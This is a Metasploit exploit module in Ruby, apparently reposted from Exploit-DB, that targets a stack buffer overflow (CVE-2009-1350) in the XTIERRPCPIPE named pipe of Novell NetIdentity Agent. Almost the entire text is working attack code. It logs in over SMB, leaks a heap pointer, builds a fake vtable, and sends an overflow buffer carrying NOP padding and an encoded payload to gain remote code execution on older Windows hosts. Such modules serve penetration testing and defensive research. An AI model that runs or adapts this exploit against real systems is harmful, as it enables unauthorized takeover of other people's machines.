Novell NetIdentity Agent – XTIERRPCPIPE Named Pipe Buffer Overflow (Metasploit)

• Exploit Database
• 10 阅读

• 作者： Metasploit
  日期： 2010-11-24
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16376/

• ##
  # $Id: netidentity_xtierrpcpipe.rb 11127 2010-11-24 19:35:38Z jduck $
  ##
  
  ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  	Rank = GreatRanking
  
  	include Msf::Exploit::Remote::SMB
  
  	def initialize(info = {})
  		super(update_info(info,
  			'Name' => 'Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow',
  			'Description'=> %q{
  					This module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending
  				a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be
  				able to execute arbitrary code. The success of this module is much greater once the
  				service has been restarted.
  			},
  			'Author' => [ 'MC', 'Ruben Santamarta' ],
  			'License'=> MSF_LICENSE,
  			'Version'=> '$Revision: 11127 $',
  			'References' =>
  				[
  					[ 'CVE', '2009-1350' ],
  					[ 'OSVDB', '53351' ],
  					[ 'BID', '34400' ],
  					[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1' ],
  				],
  			'DefaultOptions' =>
  				{
  					'EXITFUNC' => 'process', # only one shot!
  				},
  			'Payload'	=>
  				{
  					'Space'	=> 550,
  					'BadChars' => "\x00\x09\x0c\x0b\x20\x0a\x0d\x5c\x5f\x2f\x2e\x40",
  					'StackAdjustment' => -3500,
  					'PrependEncoder' => "\x81\xe4\xf0\xff\xff\xff",
  				},
  			'Platform'	=> 'win',
  			'Targets'	=>
  				[
  					[ 'Windows 2000 / Windows XP / Windows 2003', { 'Ret' => 0x41414141 } ],
  				],
  			'Privileged'	 => true,
  			'DisclosureDate' => 'Apr 6 2009',
  			'DefaultTarget'	 => 0))
  
  		register_options(
  			[
  				OptString.new('SMBUser', [ true, 'The username to authenticate as', 'metasploit']),
  				OptString.new('SMBPass', [ true, 'The password for the specified username', 'metasploit'])
  			], self.class )
  	end
  
  	def mem_leak
  		print_status("Connecting to the server...")
  		connect()
  
  		print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
  
  		begin
  			smb_login()
  		rescue ::Exception => e
  			print_error("Error: #{e}")
  			disconnect
  			return
  		end
  
  		print_status("Connecting to named pipe \\XTIERRPCPIPE...")
  
  		# If the pipe doesn't exist, bail.
  		begin
  			pipe = simple.create_pipe('\\XTIERRPCPIPE')
  		rescue ::Exception => e
  			print_error("Error: #{e}")
  			disconnect
  			return
  		end
  
  		# If we get this far, do the dance.
  		fid = pipe.file_id
  
  		# Need to make a Trans2 request with the param of 'QUERY_FILE_INFO' keeping our file_id
  		trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
  
  		# Send the first request to get our pointer.
  		leak =[0x00000004].pack('V') + [0x00000818].pack('V')
  		leak << rand_text_alpha_upper(2040)
  
  		print_status("Sending malformed request...")
  		pipe.write(leak)
  
  		heap_pointer_leaked = pipe.read()[2060,4].unpack('V')[0]
  		print_status(sprintf("Heap Pointer leaked: 0x%.8x", heap_pointer_leaked))
  
  		print_status("Building fake VTable...")
  		object = heap_pointer_leaked + 0x700
  		print_status(sprintf("Object: 0x%.8x", object))
  		method = object + 0x30
  		print_status(sprintf("Method: 0x%.8x", method))
  		shellcode = method + 0xA0
  		print_status(sprintf("Shellcode: 0x%.8x", shellcode))
  
  		pipe.close
  
  		return heap_pointer_leaked,object,method,shellcode
  	end
  
  	def exploit
  		heap_pointer_leaked,object,method,shellcode = mem_leak()
  
  		return if not shellcode
  
  		sploit =[0x00000002].pack('V')
  		sploit << [0x00000000].pack('V')
  		sploit << [object].pack('V')
  		sploit << [0x00000000].pack('V')
  		sploit << rand_text_alpha_upper(240)
  		sploit << [object].pack('V') * 32
  		sploit << [method].pack('V') * 32
  		sploit << [shellcode].pack('V') * 32
  		sploit << make_nops(748)
  		sploit << payload.encoded
  		sploit << rand_text_alpha_upper(110)
  
  		print_status("Connecting to the server...")
  		connect()
  
  		print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
  
  		begin
  			smb_login()
  		rescue ::Exception => e
  			print_error("Error: #{e}")
  			disconnect
  			return
  		end
  
  		print_status("Connecting to named pipe \\XTIERRPCPIPE...")
  
  		# If the pipe doesn't exist, bail.
  		begin
  			pipe = simple.create_pipe('\\XTIERRPCPIPE')
  		rescue ::Exception => e
  			print_error("Error: #{e}")
  			disconnect
  			return
  		end
  
  		# ok, set up and send our exploit buffer...
  		fid = pipe.file_id
  		trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
  		print_status("#{sploit.length} bytes written...")
  		pipe.write(sploit)
  
  		handler
  		disconnect
  	end
  end